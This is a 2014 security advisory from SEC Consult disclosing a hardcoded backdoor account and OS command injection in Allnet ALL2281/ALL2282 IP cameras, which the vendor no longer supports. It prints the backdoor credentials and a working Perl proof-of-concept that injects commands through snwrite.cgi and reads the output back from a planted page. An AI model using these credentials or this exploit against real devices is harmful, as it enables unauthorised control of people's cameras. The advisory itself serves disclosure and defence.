SEC Consult Vulnerability Lab Security Advisory < 20140122-1 >
=======================================================================
title: Backdoors and direct OS command execution vulnerabilities
product: Allnet ALL2281 & ALL2282 / IP-Cam Wireless Kompakt
vulnerable version: latest firmware available
fixed version: no fix from vendor, ALL2281 & ALL2282 not supported anymore
impact: critical
homepage: www.allnet.de
found: 2014-01-02
by: SEC Consult Vulnerability Lab
=======================================================================
Vendor description:
-------------------
"We are a developer and manufacturer of advanced networking and communications
technology. Our innovative networking, storage, security and home automation
products are designed in our own laboratories and distributed in many European
countries."
source: www.allnet.de
Business recommendation:
------------------------
It is highly recommended not to use this product as it is not supported by the
vendor anymore. As a workaround, only operate the IP camera in dedicated
internal networks and don't allow access from public networks.
Vulnerability overview/description:
-----------------------------------
1) Backdoor account
Allnet has integrated a backdoor into the web interface of the IP-Cam.
The hardcoded account allows unauthenticated users to access several functions
in the IP-Cam's webinterface.
2) Direct OS command execution
Several CGI-scripts/programs are vulnerable to typical OS command injection
allowing authenticated attackers to execute arbitrary commands on the
underlying operating system. In order to authenticate on the IP-Cam the
backdoor account can be used.
This leads to a full compromise of the IP-Cam.
Proof of concept:
-----------------
1) Backdoor account
productmaker:ftvsbannedcode
2) Direct OS command execution
Example for the CGI: /maker/snwrite.cgi:
---cut here---
#!/usr/bin/perl
# allnet.de webcam
# makes use of backdoor uid:pwd = productmaker:ftvsbannedcode and
# system() commands in compiled c-cgi scripts
#
# research@sec-consult.com
###############################################
use strict;
use MIME::Base64;
use Getopt::Std;
use LWP::UserAgent;
use HTTP::Request;
use HTTP::Response;
use HTTP::Headers;
$|++;
my $cmd = $ARGV[0] || 'ls -l';
my $server = $ARGV[1] || "127.0.0.1";
my $ua = new LWP::UserAgent;
my $headers = HTTP::Headers->new;
$headers->header('Content-Type' => "application/x-www-form-urlencoded");
$headers->header('Authorization' => "Basic cHJvZHVjdG1ha2VyOmZ0dnNiYW5uZWRjb2Rl");
my $content = 'mac=%60' . $cmd . '+>+/server/cgi-bin/maker/sshell.asp%60';
my $req = HTTP::Request->new('POST', "http://$server/maker/snwrite.cgi", $headers,$content);
my $res = $ua->request($req);
my $req = HTTP::Request->new('GET', "http://$server/maker/sshell.asp", $headers);
my $res = $ua->request($req);
print $res->content();
---cut here---
Vulnerable / tested versions:
-----------------------------
The following IP camera has been tested:
IP-Cam ALL2281, latest firmware available
According to the vendor the product ALL2282 shares the same code base and
might be affected too.
Vendor contact timeline:
------------------------
2014-01-09: Contacting vendor through info@allnet.de and support@allnet.de
2014-01-09: Sending advisory information
2014-01-09: Vendor: product is not supported anymore
2014-01-22: SEC Consult releases security advisory
Solution:
---------
The product is not supported anymore and there won't be any updates by the
vendor.
Workaround:
-----------
Only operate the IP camera in dedicated internal networks and don't allow
access from public networks.
Advisory URL:
-------------
www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius
Headquarter:
Mooslackengasse 17, 1190 Vienna, Austria
Phone: +43 1 8903043 0
Fax: +43 1 8903043 15
Mail: research at sec-consult dot com
Web: www.sec-consult.com
Blog: blog.sec-consult.com
Twitter: twitter.com/sec_consult
Interested to work with the experts of SEC Consult?
Write to career@sec-consult.com
EOF SEC Consult vulnerability lab / @2014